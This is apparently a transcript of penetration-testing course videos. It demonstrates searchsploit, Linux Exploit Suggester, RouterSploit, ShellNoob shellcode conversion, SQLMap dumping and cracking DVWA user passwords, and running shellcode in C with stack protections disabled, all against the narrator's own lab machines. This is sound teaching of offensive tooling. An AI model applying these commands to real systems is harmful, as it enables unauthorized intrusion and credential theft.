paste what I copied from the results in exploits/linux/local/37292.c. And I see that the file exists there. And instead of ls, I'm going to run cat. and it outputs the contents of this exploit. So I can see the code, the proof of concept, or the code that actually carries out the exploit. You'll notice that there's a number assigned with it. So this is the number, the ID in the database, 37292. I can also look by number. I can type /searchsploit -p 37292, and it will give me the information, the exploit, the URL, the path, and the file type. I can also put this information in JSON by using -j, and it will give me the JSON result. If I type in searchsploit 37292-j, it gives me the results in JSON format. And if we don't like the results here, we can pipe that into a utility like JSON_pp for pretty print and get the results formatted a little bit more nicely. Now, this is a really good way to do it if you want to take the results and use it inside of another program. You can import it in JSON format and extract the results in code and automate some of this if need be. I'm going to do one more search. So let's do /searchsploit Linux kernel, let's say 2.6. Now it does give me the local files. If I'd like to get to the web version, I could put in a -w at the end of that search. And in the results, it gives me a full URL, which I can copy, switch over to my web browser, and paste it in. And it will bring me to the results on the ExploitDB website. It provides all of the same information I have locally, but in an HTML format. And I can scroll down through the results, and vice versa. If I go to the ExploitDB website, and if I load the home page and select one of the results, it gives me a number, a numeric ID from the exploit database. I can copy that ID, switch over to my terminal window, do /searchsploit -p, and paste in the number, and it will show me the local copy of it. And that concludes this demonstration of searching for exploits using the ExploitDB. In this video, I'll demonstrate how to discover security weaknesses using the Linux Exploit Suggester shell script. This will detect security vulnerabilities based on the Linux kernel version of the machine it's run on. But there's also a way of doing it for any Linux machine. In this video, I'd like to use it on my Metasploitable VM running in QEMU, but there's a problem which I'll get to during the course of this demonstration. I'm starting out inside of my web browser in Mozilla Firefox, and I've opened github.com/mzet/linux-exploit-suggester. So this is the repository for the Linux Exploit Suggester. In the instructions to install, there's a quick download that gives a link to a wget command to download the Linux Exploit Suggester. So it's a single command line script. So I'll copy this wget command, switch over to a terminal window running on my local system, and I'm in my documents folder. So I'm going to copy this command, and it will download the Linux Exploit Suggester into a file called les.sh. So it's saved the file, and now I'll do chmod +x to les.sh to make it executable. And now I'll do /les.sh to run the command. And in this case, it gives me some information about my current system, the kernel version 5.4.0, the architecture x86_64, distribution Ubuntu, distribution version 20.04. It uses this information to look for common exploits, and it searches among 74 kernel space exploits and 45 user space exploits. And then under possible exploits, it returns nothing. So it doesn't discover anything on my current system, and it shouldn't because my system is up to date, but I want to run it on my Metasploitable system, which I know has some security vulnerabilities. So in another window, I've already launched my virtual machine with QEMU running Metasploitable, and I can get access to this Metasploitable virtual machine using SSH, and I can copy the Linux Exploit Suggester. I'll use scp-p20022, the port for SSH running on my current system that maps to the virtual machine, les.sh msfadmin at localhost, and I need to end it with a colon. And SCP, unlike SSH, requires the port be specified with an uppercase P. So the entire command is scp-p 20022, the source file les.sh, and the destination msfadmin at localhost, and I leave just a colon and an empty path, which will put it into the home directory for msfadmin. And now that the file is copied, I'll use ssh-p, lowercase p this time, 20022, msfadmin at localhost. So I'm connected, and I can run in my local folder /les.sh. And it attempts to run, but it fails, telling me that the script needs bash in version 4.0 or newer. Since I'm running an older virtual machine that's insecure, it has a problem with the version of bash to run the command. But that's okay. There's a way around this. I can type uname -a and take the string that it returns, Linux Metasploitable 2.6.24-16-server #1 SMP THU APR 10 13:58:00 UTC 2008 I686 GNU/Linux. So I copy the whole string returned by uname -a, and I'll exit out of the virtual machine and run /les.sh _uname, and then in double quotes, I paste in the uname -a result from the virtual machine into the command that I run locally, which I know can execute the les.sh, the Linux exploit suggester. And in this case, there are a whole big list of exploits. It gives me a link to the exploit in the exploit DB, the exposure, whether it's probable or less probable or likely, the download URL for the exploit, and some comments about what the exploit is. So it has the information, the CVE number, and everything we need, all the information about what exploits might be possible against that virtual machine, against my Metasploitable VM. And that concludes this demonstration of Linux Exploit Suggester. In this video, I'll demonstrate how to scan for potential router vulnerabilities using Routersploit. So Routersploit has pen testing modules for exploits, credentials, scanners, payloads, and generic attacks. There's a requirement to have Python 3 and Python 3 pip installed, and if you don't have it installed, you can use sudo apt-get install python 3-pip, and it will carry out the install. I have it installed here already, so I can move on to the next step. It's typically installed directly from the GitHub repository, which can be installed using git clone https://github.com/threat9/routersploit. Now, I already have it installed, so I don't need to run it again. And if I run it, it just tells me it already exists. Now I'll cd into Routersploit. And from my current directory, I can type python 3-m pip install-r requirements.txt. And once the requirements are installed, if they haven't been already, you can type python 3 rsf.py to run Routersploit. The first step is to scan a router with Routersploit. I can type search scanners to see what scanners are available. And in my case, I'm going to use scanners/auto pwn or auto pwn. And I can type show options to see what options are set and what options I need to set. There are some module options that show what's going to be scanned and how it's going to be scanned, but we need to specify a target. I'll set target 192.168.2.1. So this is the router on my current LAN, and I'll set that target. And at this point, all I need to do is type run. And this will carry out all of the tests based on AutoPwn. So it'll take a few minutes to complete all of these tests and check for any exploits to see what it might be vulnerable to. And at the very end, it gives me a small summary where it tells me it could not verify exploitability for some of the exploits. And these are typically based on certain hardware. It could not confirm any vulnerability and could not find default credentials, which is all a good sign. That's the result we'd like to get if our router is secure. I also have an internal router, a Wi-Fi router that's separate from my LAN router. And I can run it by changing the target. So set target, so I'll retarget autopwn to 192.168.2.17 and execute run again. And again, in this case, it could not confirm any vulnerability and could not find default credentials. Both are very good signs. And it also tells me how long it took to complete. In this case, it was 26.99 seconds in total. And this doesn't have to be specifically used for routers, although there are many of the hardware checks are router based. I can also use generic exploits directly, use exploits /generic /shellshock if I want to try shellshock. And in this case, I'm just going to type run, and it tells me that the target is not vulnerable. If I set it to another device on my network, let's say set 192.168.2.89 to target another computer, set target to 192.168.2.89, run, it tells me that the target is not vulnerable. So I can check individual exploits, or I can use autopwn, and it will run through a whole series of exploits and tests to verify that the router is not vulnerable. And that concludes this demonstration of routersploit. In this video, I'll demonstrate how to translate between opcodes and assembly instructions using ShellNoob. So far, in the previous courses in this path, many of the exploits have stopped short of trying to inject actual shell code into common vulnerabilities like stack and heap overflows, use after free, off by one errors, common string format vulnerabilities, and other problems. What those bugs introduce is a window of opportunity for an attacker to inject their own code, their own shell code. Now, shellcode can be written manually from the machine codes directly, but it's a bit of a painstaking task. A little automation in this regard goes a long way. ShellNoob doesn't write it for us, but it helps us translate and format the shellcode and removes some of the manual steps in the process. So ShellNoob comes from the GitHub repository at github.com/reyammer/shellnoob, SHELLNOOB. So I've already downloaded the Python file for ShellNoob and saved it in my home bin directory, which is in ~bin. So ls ~bin. And I have shellnoob.py, which I can run by typing shellnoob.py, and it will execute it here from my terminal window. What I'm going to do first is run it interactively and translate from assembly instructions into shellcode or opcodes one instruction at a time. I'll run shellnoob.py -i for interactive and ~intel so that we can specify the instructions in Intel syntax rather than AT&T, which is the default. And I select the first option, ASM to opcode. We can also go opcode to ASM, but I'll demonstrate that in a moment. So I'll do this way first. So the first instruction, I'll type XCHG for exchange, EAX, EBX. And it gives me the opcode 93. I can push a value, let's say push 4, which is 6A04. So each of these provides the codes I need to construct shell codes. Pop EAX, so I can type assembly instructions until I get to a point where if I'd like to execute a system call, as long as I have the correct values in the correct registers, I can type int 80h or int 0x80, and it gives me the CD80 opcode for calling interrupt 80. Now I'll type quit, and that takes me out of ShellNoob's interactive mode. Now I'll type shellnoob.py -i -intel, and I'll select option 2 this time, opcode to ASM. And if I type something like CD80, it gives me int 80 as the instruction. C3 gives me ret for return. 94 gives me the exchange of ESP and EAX. If I type a long series of codes, let's say B8, 0A, 00, 0000, C3, gives me two instructions, move EAX, 0xa, so we're moving A into EAX, and then ret. So all of these instructions get translated by ShellNoob into their assembly equivalents. If I type something at random, it gives me the result of the opcode. Now, I type a bunch of numbers and they're invalid, it gives me invalid hex, which is good because if I'm trying to inject shellcode and I have an invalid shellcode, then it's not going to perform as expected. So it's good for catching typos or common errors that you might come across when trying to construct shellcodes. And that concludes this demonstration of resolving opcodes and assembly instructions using shellnoob. In this video, I'll demonstrate how to convert an assembly code file into various shellcode formats using shellnoob. So in my current folder, inside of Documents example-05-12, I'll type ls, and I have two files in this folder. The first is code.asm, an assembly file that we're going to convert into shellcode of various formats. And then exec_shellcode.c with a small c example code with some shellcode already defined in it. So I'll type cat of code.asm to inspect the contents of code.asm. And all this contains is 7 lines of assembly code. The first is move MOV EBX, EAX, push 54, pop EAX, move ECX, 429-494-8047, not ECX, move EDX, 667-291-80, and then int 0x80. The first thing to remark is that this is in Intel syntax and not AT&T. Shellnoob uses AT&T by default, so we'll have to specify the Intel switch. So if I type shellnoob.py --Intel, I'll be sure to parse this as an Intel syntax ASM file. And now I'll type code.asm and then convert it. Let's convert it to C. So --2-C converts it into C file in the file code.c. So if I type ls now, there's a new file called code.c. If I type cat code.c, we can see that all this does is define a char shellcode, double brackets equals, and the string \x89 \xc3, and so on, all of the codes that define the instructions. And it's done in the C format. Now I'll arrow up a couple of times back to my shellnoob command, and this time I'm going to run shellnoob.py --Intel code.asm, so the same input, --2-bin, and this will create a binary file. Now I shouldn't use cat to display the contents, because if I type cat code.bin, it gives me some ugly characters that can't be displayed inside of my terminal window. The proper way to display a binary file like this is using hexdump. So hexdump of code.bin, and it shows the contents of the machine code in binary format. And if you inspect the machine code in the output, the first 2 bytes are C3 and 89. And if I look at the shellcode above, the C shellcode, I have \x89 \xc3. So the order is reversed, but it's the same codes. So each byte comes in the opposite order, but the results are essentially the same. They're built from the same assembly code. Now if I arrow up a couple of times and run shellnoob.py --Intel code.asm --2-Python, I get a result, a shellcode that's compatible with Python. So I can bring it into a Python script. So if I type cat of code.python that was created, it gives me the \x89 \xc3 and so on that can be copied into a Python script. So what I would do, say with the C code, if I type cat of code.c, I can highlight the char shellcode and all of the shellcode contents right to the end of the line, right to the semicolon, copy, and now I'll use a program like Emacs or some code editor to open exec_shellcode.c, and I paste into the main function the char shellcode that I extracted and delete the shellcode that was already there. And I have a program that executes or could inject a different shellcode. And I'll quit out of that shellcode. So instead of looking at each instruction one by one, compiling it into machine code or translating it into machine code, and then writing out all the \x and the numeric values, I can just use shellnoob, and that helps me complete this process very quickly and get the shellcode into my program without any extra hassle. And that concludes this demonstration of converting shellcode. In this video, I'll demonstrate how to explore the use of SQL injection attacks and protections against them using SQL Map. I'll be using the Metasploitable virtual machine I have installed, which I demonstrated in the video titled Running a Virtual Environment. So I've run the command with sudo because I need access to map port 80. So I've run sudo QEMU-system-x86_64 -m2g for 2 GB of RAM -nic user, host fwd equals TCP://2002:22. So I'm mapping the local port 20022 to port 22 in the virtual machine in case we need SSH access, and then host fwd equals TCP://80:80, mapping the local port 80 to port 80 in the virtual machine, and then -hda metasploitable.qcow2. So I have this virtual machine up and running, and now I'm going to switch over to Firefox, and I've loaded localhost/dvwa/login.php. Now this is not running on localhost, it's actually mapping port 80, it's mapping the web service running in the virtual machine in Metasploitable to my local host, so I need to load it this way. And now it asks for a username and password, and in this case, it's admin and password as the password because it's a vulnerable web app. And I'm going to select SQL injection, and it's going to give me a form for a user ID. I'm going to put 1 and select submit, and it changes the URL. So I'm going to grab the current URL because I'm going to use this as a way of getting into the database. So I select the URL, copy it. Now I'll switch over to my terminal window, my free terminal window, and I'm going to install SQL Map. And for this, the command to install it is git clone --depth 1 https://github.com/SQLMap project/SQLMap.git SQL Map. And now I'll cd into the SQL Map folder and type python 3 SQLMap.py -u, and then in quotes, I paste in the URL I copied from Firefox. So http://localhost/dvwa/vulnerabilities/sqli/?ID=1 ampersand submit equals submit hash, and then I close the double quote. And I'll put a space after it because I'm going to need some more information before I can run this command. So I'll switch back to Firefox. I'm going to select the menu, go to Web Developer, and Network. Now I'll press reload so we can get the network activity. I'm going to select the first GET request with the path that we copied, and I'm going to go to the request headers in the headers section down to cookie, and I'm going to select it and copy. Now I'll switch back to the terminal window and paste the cookie information in. Now I need to modify this first. The important thing is the session ID, the PHP sesh ID. But the cookie parameter is going to be _cookie equals, and then in quotes, instead of security equals high, I'm going to put in security equals low. Remove the second security directive, then have PHP sesh ID equals, and then keep the long hexadecimal value, and I close the double quote. And I'll try the option $DBS. It'll try to get into the database and list the databases that it has. And in this case, it got in very quickly because I ran this command previously. SQL Map resumed the following injection points from stored session. So it had that information from previously running the command, so it lists it right away. If you're running for the first time, it may take a few minutes to get in, but it should list the databases available. Now I'll arrow up and change the $DBs, but leave everything else the same. Now I'll give the argument $D DVWA, so I'm selecting a database, --tables. So when I select the database and put --tables, it connects and lists the tables in that database. Now I'll arrow up again. I'll leave the database -D DVWA, and now hyphen uppercase T, users, double hyphen columns. So this will list the columns in the users table. So it has user, avatar, first name, last name, password, and user ID. Now we're going to take this another step and run that last command. Instead of double hyphen columns, I'm going to specify hyphen C, uppercase C, user, comma, password, double hyphen dump. And ask me, do I want to crack them via a dictionary-based attack? I select yes. And I'm going to select the default dictionary file. And do you want to use common password suffixes? I'll select yes. And it's going through comparing the hashes with the dictionaries, carrying out the dictionary attack, and returning the passwords for users in the database. So you can see how very powerful this tool is if we encounter a weak database that's not using up-to-date security. And that concludes this demonstration of SQL injection using the SQL Map Python utility. In this video, I'll demonstrate what a shellcode setup in C looks like, but I'll have to disable compiler protections so that the code can execute successfully. Otherwise, injecting shellcode the way I'm going to do here won't work. So I have some example code, but there's one little piece missing, the shellcode itself. I'll describe the code first, and then I'll insert the shellcode. So on line 1, I have include stdio.h so that we can do a printf of result we're going to generate. On line 3, I define the main method, int main, with int argc, comma, char star argv double brackets. So a typical main function. Then in the body of the function on line 5, I have a comment that says to do insert shellcode. So our shellcode is going to be defined here as unsigned char shellcode double brackets equals, and then I have an empty string. To get my shellcode, I'm going to go to the terminal window, and in this current folder, I have a file called shellcode.asm. I'm going to use cat to output the contents of this, and it contains two instructions, a move and a return. So mov $0x05 comma %EAX. So we're moving the value 5 into register EAX, and we're returning. So if this were inside of a function, it would return the value 5. I have installed here shellnoob, which I covered in a previous course, and I'm going to use it with the input from shellcode.asm. So I'll do double hyphen from hyphen asm, specify shellcode.asm, and then double hyphen to C. And it generates a file called shellcode.c. If I type cat shellcode.c, it has char shellcode double brackets equals, and then it has the shellcode, the actual instructions translated into the mnemonic codes. So I'll copy this and I'll replace what I have in my C file. So our B8, our move into EAX, the value 5. So it's the string is \x B8 \x 05. And then we need to fill out the rest of the bytes \0x00. And we do that 3 times, followed by \x C3. So it has our return. Then on line 7, I have int result. And then on line 8, I define a function pointer, int. And in parentheses, I have star fun _ p for function pointer. And then double parentheses equals. And then in parentheses, I have int. And in parentheses, star, double parentheses, and then shellcode. So our function is an int pointer into our shellcode. So we're manufacturing this function out of a function pointer to shellcode. And this is exactly the type of thing an exploit will do if it tries to inject a payload like this into a buffer overflow, modify a return parameter, which points to that code. And then on line 9, I have result equals fun _ p double parentheses. So we're actually calling the function through the function pointer. And then on line 11, I have printf with the formatted string %d \n, comma, result. So if it works correctly, we should get the result 5. And at the end of the main function, I return 0. So let's see if this compiles. So from my terminal window, gcc of eg-06-03.c, I compile the code, and now /a.out, which was just created. And we get a segmentation fault. Well, I didn't disable any of the compiler protections. And with the protections turned on, this sort of thing won't work because we can't inject shellcode from the stack this way. So to make sure we can execute it, there's a couple of things we need to do. gcc-f no-stack-protector. So no stack protector -z exec stack. So we make the stack executable and we disable the stack protector. We recompile it, and now /a.out. We can't even execute it like that. We have to move this from inside of our function to be a global function. So we move the data segment where our shellcode exists. And if I compile it like this and run /a.out, I get the correct result, 5. So on the stack of the main function, even disabling the protections doesn't work for us. We have to move it outside of main and into the program stack as a global variable. So it's quite tricky to get code like this to work and to execute without giving us a segmentation fault. And this is by design. This is what we want. We don't want attackers inserting shellcode into our code, finding some way to get that code in there and executing whatever they want. And that concludes this demonstration of executing shellcode.